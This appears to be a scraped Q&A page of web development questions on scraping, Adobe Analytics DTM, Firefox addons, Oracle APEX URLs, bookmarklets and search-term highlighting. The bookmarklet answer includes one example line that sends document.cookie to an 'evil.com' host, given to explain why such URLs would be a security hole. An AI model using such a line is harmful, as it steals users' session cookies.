Parsing tables from a dynamically changing URL source

I want to parse tables spread over many pages from the URL below:
https://www.marketscreener.com/tools/stock-screener/
However, the page URL changes dynamically on every click (even though the data in the tables remains unchanged). I am not well versed in recent web development technologies. I have some experience with requests and lxml XPath, but how do I pass the dynamic URL to requests.get? I tried to get the source container from the Network tab in Chrome, but that doesn't seem to work either.
Edit_1:
Further to @Andrej Kesely's comments: my desired output is the href data in the table links (.//table//tbody/tr/td//a/@href), which I can get with a routine lxml xpath call. My real challenge precedes that: the URL keeps changing dynamically, so I am having trouble passing a static URL to requests.get. I hope that makes things clear.

Related

Set the Visitor ID in Adobe Analytics through DTM

I'm trying to set the Visitor ID in Adobe Analytics through DTM.
Above the s_code I have:
var visitor = new Visitor("xxxx")
visitor.trackingServer = "xxx.xx.xx.omtrdc.net"
I've created a data element where the legacy code used to call the
Visitor.getInstance("xxxx");
and set the Visitor ID to %Visitor ID%
That's not working however, and my visitor ID is always just set to %Visitor ID% and obviously not reading any values. I'd really appreciate any input that someone can give me.
Thanks,
Mike
The Visitor ID pops s.visitorID and is in general related to visitor id, but is not the same as s.visitor which is what gets popped for the VisitorAPI integration. DTM does not currently have a built-in field for the s.visitor variable, so you will have to set it yourself within the config, either in the Library Management code editor (assuming you are opting to c/p the core lib and not the "Managed by Adobe" option) or else in the Custom Page Code section.
Since you are popping it in a data layer first, you can reference the data layer like this:
s.visitor = _satellite.getVar('Visitor ID');
NOTE: A separate potential issue you may have is with whether or not the Visitor object is available for your data element. Since data elements are the first thing to be evaluated by DTM, you will need to ensure that the VisitorAPI.js library is output before your top page DTM script include.
If this is a problem for you, or if you are wanting to host VisitorAPI.js within DTM, then you may need to adjust where you are popping that stuff. For example, place the VisitorAPI core code above the custom code as the first stuff within the data element, before:
var visitor = new Visitor("xxxx");
visitor.trackingServer = "xxx.xx.xx.omtrdc.net";
Or, don't use the data element at all. Instead, put the VisitorAPI code within the Adobe Analytics custom code or core lib section and pop all that stuff there (above the s.visitor assignment). Or use any of a number of other methods; the point is that the VisitorAPI stuff must be loaded before the data element can make use of it, same as it must be loaded before Adobe Analytics can make use of it.
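A minimal sketch of the load-order check described above, assuming the Visitor global is defined by VisitorAPI.js. The helper name getVisitorIfLoaded and its root parameter are hypothetical (they are not part of DTM or VisitorAPI); root is passed in only so the check can be exercised outside a browser, and in a page it would be window.

```javascript
// Hypothetical helper: return the Visitor instance only if VisitorAPI.js
// has already defined the Visitor global on `root`; otherwise return null.
function getVisitorIfLoaded(root, orgId) {
  if (root && root.Visitor && typeof root.Visitor.getInstance === 'function') {
    return root.Visitor.getInstance(orgId);
  }
  return null; // VisitorAPI.js has not been loaded yet
}

// Possible use in the page (an assumption, shown for illustration only):
//   var v = getVisitorIfLoaded(window, "xxxx");
//   if (v) { s.visitor = v; }
```

If the helper returns null, the script include order is the first thing to check.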
So DTM is changing pretty fast and furious right now. They have a "Marketing Cloud Service ID" that works well. Before I used that, however, I did find a way to fix the code. Crayon Violent was right, as usual, that the problem was that the script wasn't available yet. I fixed this by putting the following code in between the VisitorAPI.js and the AppMeasurement stuff in the DTM managed library.
var aA = new AppMeasurement();
aA.visitorNamespace="companyname";
aA.visitor = Visitor.getInstance("companyname");
In addition, there were also some issues using my localhost for testing while trying to see if I had this correct or not. If you are having issues and think you have it correct, it may be worthwhile to elevate it to a different environment.

Access specific extension object data from page code

I'm trying to build an addon that will observe and collect XHR and image responses received on a page and make them available to page script (on that page) for further inspection.
In my 'http-on-examine-response' observer code, I push the URLs I'm interested in onto an array for their associated window; the arrays are stored in an object keyed by window ID, something like this:
myWindowId = resp.outerWindowID+'-'+resp.currentInnerWindowID;
storedResponses[myWindowId].push(subject.URI.spec);
(I thought that approach may be better than using tab references to identify unique source windows)
The relevant arrays are updated automatically as any page makes a request.
I'd like to be able to query the relevant array from page script or a bookmarklet at any time.
Should I set up port.on..., or postMessage() communication between the page/bookmarklet, content script and extension, or use a pageMod to write the appropriate array directly to an unsafeWindow global object on the relevant page?
I couldn't figure out how to make a pageMod write a specific array to a specific page as soon as the new responses were observed.
Full source is here -
https://builder.addons.mozilla.org/addon/1064905/latest/
I think it's all working, apart from getting the data back on to the page.
With help from Wladimir Palant, I found that XPCNativeWrapper.unwrap() is defined and does what I needed from the SDK module context. It allowed me to set variables directly in a window from my addon.
More info about wrappers here -
https://developer.mozilla.org/en/XPCNativeWrapper

How to dynamically generate url for image map in Oracle ApEx?

The scenario:
I have an ApEx page which pulls a record from a table. The record contains an id, the name of the chart (actually a filename) and the code for an image map as an NVARCHAR2 column called image_map.
When I render the page I have an embedded HTML region which pulls the image in using the #WORKSPACE_IMAGES#&P19_IMAGE. substitution as the src for the image.
Each chart has hot spots (defined in the image_map html markup) which point to other charts on the same ApEx page. I need to embed the:
Application ID (like &APP_ID.)
Session (like &APP_SESSION.)
My problem:
When I try to load the &APP_ID as part of the source into the database it pre-parses it and plugs in the value for the ApEx development app (e.g. 4500) instead of the actual target application (118).
Any help would be greatly appreciated.
Not a lot of feedback - guess I'm doing something atypical?
In case someone else is trying to do this, the workaround I ended up using was to have a javascript run and replace some custom replacement flags in the urls. The script is embedded in the template of the page and assigns the APEX magic fields to local variables, e.g.:
var my_app_id = '&APP_ID.';
Not pretty, but it works...
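A minimal sketch of that kind of flag replacement, under stated assumptions: the flag format (__APP_ID__, __APP_SESSION__), the function name fillUrlFlags, and the sample f?p= URL are all hypothetical and chosen only for illustration; the original post does not say which flags were used.

```javascript
// Replace custom flags such as __APP_ID__ in a URL with runtime values.
// Flags with no matching value are left untouched.
function fillUrlFlags(href, values) {
  return href.replace(/__([A-Z]+(?:_[A-Z]+)*)__/g, function (match, name) {
    return Object.prototype.hasOwnProperty.call(values, name)
      ? String(values[name])
      : match;
  });
}

// In the page template the values would come from APEX substitutions and the
// hrefs from the image map (illustrative only, not run here):
//   var values = { APP_ID: '&APP_ID.', APP_SESSION: '&APP_SESSION.' };
//   document.querySelectorAll('map area').forEach(function (area) {
//     area.setAttribute('href', fillUrlFlags(area.getAttribute('href'), values));
//   });
```

Because the stored markup contains only the custom flags, the database never sees an APEX substitution string that could be pre-parsed on load.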
Ok - I think I've left this open long enough... In the event that anyone else is trying to (mis)use apex in a similar way, it seems like the "apex way" is to use dynamic actions (which seem stable from 4.1.x) and then you can do your dynamic replace from there rather than embedding js in the page(s) themselves.
This seems to be the most maintainable, so I'll mark this as the answer - but if someone else has a better idea, I'm open to education!
I found it difficult to set a dynamic URL directly on a link to another page: including the full URL as an individual link target doesn't work, at least in my simple setup. I'm not an expert (as AJ said, any wisdom is appreciated).
Instead, I set the individual components of the URL via the link and use a 'Before Header' PL/SQL process on the target page to combine them into a full URL and assign it to the full-URL page item:
APEX_UTIL.set_session_state(
'PG_FULL_URL',
'http...'||
v('PG_URL_COMPONENT1')||
v('PG_URL_COMPONENT2')||
'..etc..'
);
...where PG_FULL_URL is an item of Type 'Display Image', 'Based On' 'Image URL stored in Page Item Value'.
This is Apex 5.1 btw, I don't know if some of these options are new in this release.

Combine URL and a javascript bookmarklet together

I need to access some data on someone's site. The way to get to that page is to visit http://www.foosite.com and click a link which has javascript:foo(); to bring up the real data.
foo() is like:
function foo(param){
createXXXCookie('COOKIE_NAME', param, 60);
window.location.href="/current/location";
}
So this basically sets the cookie and reloads the page. During page load, the document-ready handler reads COOKIE_NAME and displays the corresponding data.
I want to use MS Excel to grab some data from this page, so I was looking for a one-step way to get the data. In the browser address bar, I can enter http://www.foosite.com first and then enter javascript:foo(); to invoke foo(). I was wondering whether combining the URL and the bookmarklet, like http://www.foosite.com;javascript:foo();, could work. I actually tried this, but it seems IE/FF/GC skip the javascript:... part and just load the first part of the URL.
This is not possible.
Had it been possible, it would be a deadly security hole.
Email someone a shortlink to http://somebank.com;javascript:$.getScript('http://evil.com/steal?payload=' + encodeURIComponent(document.cookie)), and move on from there to auto-submitting forms.

How does a website highlight search terms you used in the search engine?

I've seen some websites highlight the search engine keywords you used to reach the page (such as the keywords you typed in the Google search listing).
How does it know what keywords you typed in the search engine? Does it examine the referrer HTTP header or something? Any available scripts that can do this? It might be server-side or JavaScript, I'm not sure.
This can be done either server-side or client-side. The search keywords are determined by looking at the HTTP Referer (sic) header. In JavaScript you can look at document.referrer.
Once you have the referrer, you check to see if it's a search engine results page you know about, and then parse out the search terms.
For example, Google's search results have URLs that look like this:
http://www.google.com/search?hl=en&q=programming+questions
The q query parameter is the search query, so you'd want to pull that out and un-URL-escape it, resulting in:
programming questions
Then you can search for the terms on your page and highlight them as necessary. If you're doing this server-side, you'd modify the HTML before sending it to the client. If you're doing it client-side, you'd manipulate the DOM.
There are existing libraries that can do this for you, like this one.
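As a rough illustration of the highlighting step, here is a minimal sketch that works on the plain text of a single text node rather than on a full HTML document. The function name highlightTerms and the choice of the mark element are assumptions made for this example, not something taken from a particular library.

```javascript
// Escape characters that have a special meaning in a regular expression.
function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Escape text so it can be placed safely inside HTML.
function escapeHtml(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Wrap every occurrence of each search term (case-insensitive) in <mark>.
// `text` is plain text, `query` is the decoded search string.
function highlightTerms(text, query) {
  var terms = query.split(/\s+/).filter(Boolean).map(escapeRegExp);
  if (terms.length === 0) return escapeHtml(text);
  var pattern = new RegExp('(' + terms.join('|') + ')', 'gi');
  // split() with a capturing group puts the matches at the odd indices.
  return text.split(pattern).map(function (part, i) {
    return i % 2 === 1
      ? '<mark>' + escapeHtml(part) + '</mark>'
      : escapeHtml(part);
  }).join('');
}
```

Working on text content rather than raw markup avoids accidentally matching terms inside tag names or attributes.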
Realizing this is probably too late to make any difference...
Please, I beg you -- find out how to accomplish this and then never do it. As a web user, I find it intensely annoying (and distracting) when I come across a site that does this automatically. Most of the time it just ends up highlighting every other word on the page. If I need assistance finding a certain word within a page, my browser has a much more appropriate "find" function built right in, which I can use or not use at will, rather than having to reload the whole page to get it to go away when I don't want it (which is the vast majority of the time).
Basically, you...
Examine document.referrer.
Keep a map from each search engine's domain to the GET param that contains the search terms.
var searchEnginesToGetParam = {
'google.com' : 'q',
'bing.com' : 'q'
}
Extract the appropriate GET param, and decodeURIComponent() it.
Parse the text nodes where you want to highlight the terms (see Replacing text with JavaScript).
You're done!
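The extraction steps above can be sketched as follows. This is a minimal example, assuming an environment that provides the standard URL class (modern browsers and Node.js); the function name extractSearchTerms is hypothetical, and the referrer is passed in as an argument so that document.referrer can be supplied in a page.

```javascript
// Map of search-engine domain -> GET param that holds the search terms.
var searchEnginesToGetParam = {
  'google.com': 'q',
  'bing.com': 'q'
};

// Return the decoded search terms from a referrer URL, or null if the
// referrer is missing, malformed, or not a known search engine.
function extractSearchTerms(referrer) {
  var url;
  try {
    url = new URL(referrer);
  } catch (e) {
    return null; // empty or malformed referrer
  }
  var domains = Object.keys(searchEnginesToGetParam);
  for (var i = 0; i < domains.length; i++) {
    var domain = domains[i];
    // Match the domain itself or any subdomain such as www.google.com.
    if (url.hostname === domain || url.hostname.endsWith('.' + domain)) {
      // searchParams.get() already URL-decodes the value ("+" becomes " ").
      return url.searchParams.get(searchEnginesToGetParam[domain]);
    }
  }
  return null;
}

// In a page: var terms = extractSearchTerms(document.referrer);
```

Note that many search engines no longer include the query in the referrer they send, so a null result should be treated as the normal case.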

Resources